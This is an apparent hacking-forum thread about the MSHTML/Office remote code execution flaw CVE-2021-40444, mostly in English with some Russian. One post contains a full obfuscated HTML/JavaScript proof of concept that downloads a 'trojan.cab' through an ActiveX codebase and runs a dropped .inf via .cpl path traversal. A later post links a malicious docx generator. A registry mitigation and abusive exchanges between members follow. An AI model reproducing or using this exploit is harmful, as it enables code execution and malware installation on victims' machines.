Local RCE, MSHTML, CVE-2021-40444

[z3r013]

New Cool vulnerability in MS Office which triggers without macro,
So as far as i know there's no payload generator available but if i'll find one i'll share it here.

So whole magic in this exploit happens while oppening the document, it loads html file which contains obfuscated JS

- Analyzing Microsoft Zero-Day Exploit (CVE-2021-40444)

 

[r1z]

PoC

<!DOCTYPE html>
<html>
 <head>
  <meta http-equiv="Expires" content="-1">
  <meta http-equiv="X-UA-Compatible" content="IE=11">
 </head>
 <body>
  <script>
function(){
  try{
    window['HTMLElement']['prototype']['appendChild']['call'](window['document']['body'],
      window['Document']['prototype']['createElement']['call'](window['document'],'iframe'));
  }catch(_0x1c747c){
    window['HTMLElement']['prototype']['appendChild']['call'](window['document']['documentElement'],
      window['Document']['prototype']['createElement']['call'](window['document'],'iframe'));
  }
  iframeActxHtml1 = new window['Document']['prototype']['createElement']['call'](window['document'],'iframe')['contentWindow']['ActiveXObject']('htmlfile');
  window['Document']['prototype']['createElement']['call'](window['document'],'iframe')['contentDocument']['open']()['close']();
  try{
    window['HTMLElement']['prototype']['removeChild']['call'](window['document']['body'],
      window['Document']['prototype']['createElement']['call'](window['document'],'iframe'));
  }catch(_0x5afb73){
    window['HTMLElement']['prototype']['removeChild']['call'](window['document']['documentElement'],
      window['Document']['prototype']['createElement']['call'](window['document'],'iframe'));
  }
  iframeActxHtml1['open']()['close']();
  var iframeActxHtml2= iframeActxHtml1['Script']['ActiveXObject')]('htmlFile');
  iframeActxHtml2['open']()['close']();
  iframeActxHtml3 = iframeActxHtml2[('Script')]['ActiveXObject']('htmlFile');
  iframeActxHtml3['open']()['close']();
  var iframeActxHtml4=new iframeActxHtml3['Script'][('ActiveXObject')]('htmlFile');
  iframeActxHtml4['open']()['close']();
  var actx_html_0=new ActiveXObject('htmlfile'),
  actx_html_1=new ActiveXObject('htmlfile'),
  actx_html_2=new ActiveXObject('htmlfile'),
  actx_html_3=new ActiveXObject('htmlfile'),
  actx_html_4=new ActiveXObject('htmlfile'),
  actx_html_5=new ActiveXObject('htmlfile'),
  xmlhttpreq1=new window['XMLHttpRequest'](),
  window['setTimeout']=window['setTimeout'];
  window['XMLHttpRequest']['prototype']['open']['call'](xmlhttpreq1,'GET','http://localhost/trojan.cab',![]),
  window['XMLHttpRequest']['prototype']['send']['call'](xmlhttpreq1),
  iframeActxHtml4['Script']['document']['write']('&amp;lt;body>');
  var cabloadunpack=window['Document']['prototype']['createElement']['call'](iframeActxHtml4['Script']['document'],'object');
  cabloadunpack['setAttribute']('codebase','http://localhost/trojan.cab#version=5,0,0,0');
  cabloadunpack['setAttribute']('classid','CLSID:b7771b25-4e74-4168-add9-04062d629d9a'),
  window['HTMLElement']['prototype']['appendChild']['call'](iframeActxHtml4['Script']['document']['body'],cabloadunpack),
  actx_html_0['Script']['location']='.cpl:123',
  actx_html_0['Script']['location']='.cpl:123',
  actx_html_0['Script']['location']='.cpl:123',
  actx_html_0['Script']['location']='.cpl:123',
  actx_html_0['Script']['location']='.cpl:123',
  actx_html_0['Script']['location']='.cpl:123',
  actx_html_0['Script']['location']='.cpl:123',
  actx_html_0['Script']['location']='.cpl:123',
  actx_html_0['Script']['location']='.cpl:123',
  actx_html_0['Script']['location']='.cpl:../../../AppData/Local/Temp/Low/whoiam.inf',
  actx_html_1['Script']['location']='.cpl:../../../AppData/Local/Temp/whoiam.inf',
  actx_html_2['Script']['location']='.cpl:../../../../AppData/Local/Temp/Low/whoiam.inf',
  actx_html_3['Script']['location']='.cpl:../../../../AppData/Local/Temp/whoiam.inf',
  actx_html_4['Script']['location']='.cpl:../../../../../Temp/Low/whoiam.inf',
  actx_html_3['Script']['location']='.cpl:../../../../../Temp/whoiam.inf',
  actx_html_3['Script']['location']='.cpl:../../Low/whoiam.inf',
  actx_html_3['Script']['location']='.cpl:../../whoiam.inf';
}();
  </script>
 </body>
</html>

To disable installing ActiveX controls in Internet Explorer in all zones, paste the following into a text file and save it with the .reg file extension:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0]
"1001"=dword:00000003
"1004"=dword:00000003

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1001"=dword:00000003
"1004"=dword:00000003

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2]
"1001"=dword:00000003
"1004"=dword:00000003

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1001"=dword:00000003
"1004"=dword:00000003

Double-click the .reg file to apply it to your Policy hive.
Reboot the system to ensure the new configuration is applied.

./r1z

 

[bbi34yy]

It has been discussed here before already.
Our member posted link already to github:
_https://raw.githubusercontent.com/Udyz/CVE-2021-40444-Sample/main/poc.html
So you just copy/pasted it from there.

 

[r1z]

It has been discussed here before already.
Our member posted link already to github:
_https://raw.githubusercontent.com/Udyz/CVE-2021-40444-Sample/main/poc.html
So you just copy/pasted it from there.

It's PoC in 'Software Vulnerabilities / Exploiting' and explain the PoC and how to disable it.

 

[bbi34yy]

Yeah. You update post while i was making the answer.
My bad.

 

[r1z]

Yeah. You update post while i was making the answer.
My bad.

It's okay; we all know your talk too much here for nothing.

 

[Kelegen]

Yeah. You update post while i was making the answer.
My bad.

пиндос исправляется, а ты на него бочку хотел катить
негоже так делать

 

[bbi34yy]

It's okay; we all know your talk too much here for nothing.

Your opinion is not important even for your parents, that's why you are begging for likes here and there, just like you begging for their attention.

 

[r1z]

пиндос исправляется, а ты на него бочку хотел катить
негоже так делать

he's just try to improve himself by writing like a robot to get more reactions; no worries.

 

[Kelegen]

he's just try to improve himself by writing like a robot; no worries.

I don't give a damn about everyone, I'm a dandelion of God?

 

[bbi34yy]

lol.
Im sorry you get used to treatment like that. And if somebody called you a dog - you doing just like they say. But if you doesn't respect yourself, that doesn't means everybody else is doing the same, dawg.
But pasting code from github - is hella of skill, doggy.

 

[Ventrue]

автор конечно тот еще кусок дерьма.

 

[ColorS]

оригинально было спиздить код с гитхаба?)

 

[z3r013]

CVE-2021-40444 PoC​

Malicious docx generator to exploit CVE-2021-40444 (Microsoft Office Word Remote Code Execution)

Creation of this Script is based on some reverse engineering over the sample used in-the-wild: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (docx file)

You need to install lcab first (sudo apt-get install lcab)

https://github.com/lockedbyte/CVE-2021-40444

Don't forget to press "Like", it's free <3

 

[DildoFagins]

Недохера уже топиков об этом эксплойте наплодили на форуме?

 

[z3r013]

Недохера уже топиков об этом эксплойте наплодили на форуме?

?

 

[weaver]

Объединил в одну тему.

z3r013 Пользуйся поиском. Чтобы не плодить однотипные темы.

 

[z3r013]

Объединил в одну тему.

z3r013 Пользуйся поиском. Чтобы не плодить однотипные темы.

I Opened Separated topic because it contained exploit generator, not only PoC, Thanks Anyway